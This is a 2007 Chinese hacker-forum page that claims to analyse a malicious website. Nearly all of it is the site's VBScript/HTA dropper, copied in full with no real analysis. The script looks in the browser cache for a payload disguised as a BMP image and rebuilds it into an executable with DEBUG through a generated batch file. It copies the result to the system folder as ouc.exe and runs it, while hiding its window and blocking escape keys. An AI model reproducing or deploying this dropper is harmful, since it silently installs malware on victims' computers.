文章 | 入侵攻击 | 安全防御 | 操作系统 | 网站建设 | 网络编程 | 路由交换 | 灾难恢复 | 新闻资讯 | 安全公告
下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创发布 | 动画教程
论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 美女贴图 | 灌水无罪 | 在线服务 | 会员照片 | 网站首页
 当前位置:主页 >> 技术文摘 >> 网络编程 >> ASP编程 >> 文章内容  
 

 
分析VBS脚本恶意网站!

www.hx99.org 阅读: 时间:2007-07-29 整理:华西黑盟
------------------------------------------------------------------
 218.6.168.98  www.joyiex.com  <<<<www.joyiex.com 这个网站大家多知道哈
不要去看......
<SCRIPT LANGUAGE="VBScript">
Option Explicit
Dim FSO,WSH,CACHE,str,sucess
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")
sucess=0
sub FF
SearchBMPFile fso.GetFolder(CACHE),"ouc[1].bmp"
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"ouc[2].bmp"
End sub
Function SearchBMPFile(Folder,fname)
   Dim SubFolder,File,Lt,tmp,winsys
   str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname';);
   if FSO.FileExists(str) then
      tmp=fso.GetSpecialFolder(2) & "\"
      winsys=fso.GetSpecialFolder(1) & "\"
      set File=FSO.GetFile(str)
      File.Copy(tmp & "tmp.dat")
      On Error Resume Next
      File.Delete
      if FSO.FileExists(str) then exit function
      set Lt=FSO.CreateTextFile(tmp & "tmp.in")
      Lt.WriteLine("rbx")
      Lt.WriteLine("0")
      Lt.WriteLine("rcx")
      ';下面的数字是十六进制的EXE文件的大小
      Lt.WriteLine("2400")
      Lt.WriteLine("w136")
      Lt.WriteLine("q")
      Lt.Close
      set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
      Lt.WriteLine("@echo off")
      Lt.WriteLine("debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
      Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "ouc.exe>" & tmp & "tmp.out")
      Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
      Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
      Lt.WriteLine(winsys & "ouc.exe")
      Lt.Close
      WSH.Run tmp & "tmp.bat",false,6
      On Error Resume Next
      ';FSO.GetFile(tmp & "tmp.bat").Delete
      sucess=1
      window.close ()
   end if
   If Folder.SubFolders.Count <> 0 Then
      For Each SubFolder In Folder.SubFolders
         SearchBMPFile SubFolder,fname
      Next
   End If
End Function
</script>
<SCRIPT language=JavaScript>
function F()
{
  FF();
  if (sucess==0) setTimeout("F()", 2000);
}
setTimeout("F()", 2000);
parent.moveTo((screen.width-0)/2,(screen.height-0)/2);
parent.resizeTo(0,0);
</SCRIPT>
</head>
<HTA:APPLICATION caption="no" border="none"
SHOWINTASKBAR="no">
<body bgcolor="&#35;ffffff" text="&#35;000000" scroll="no" leftmargin="2" topmargin="3"
marginwidth="0" marginheight="0" oncontextmenu=';self.event.returnvalue=0';
onkeydown="javascript:if(event.keyCode==27 || event.keyCode==78 && event.ctrlKey)return
false;">
</body>
</html>
   -------------------------------------------------------------------------------------------
  上一篇:asp程序错误详细说明例表
  下一篇:关于ASP连接ACCESS数据库的方法
   -------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
网页编程中页面之间值的传
ASP设计常见问题及解答精
在ASP文件中调用DLL
关于ASP连接ACCESS数据库
分析VBS脚本恶意网站!
教你做ASP论坛
每个ASP程序员必备的知识
全面详尽剖析一句话asp木
ASP简单防盗链方法谈
asp程序错误详细说明例表
ActiveX组件及其注册
ASP 编程中 20 个非常有用
整理ASP的19个基本技巧
ASP程序发送信件的几种方
经典!5分钟编写一个ASP论
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2007 Www.Hx99.Net
版本:华西黑盟网站系统V5.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号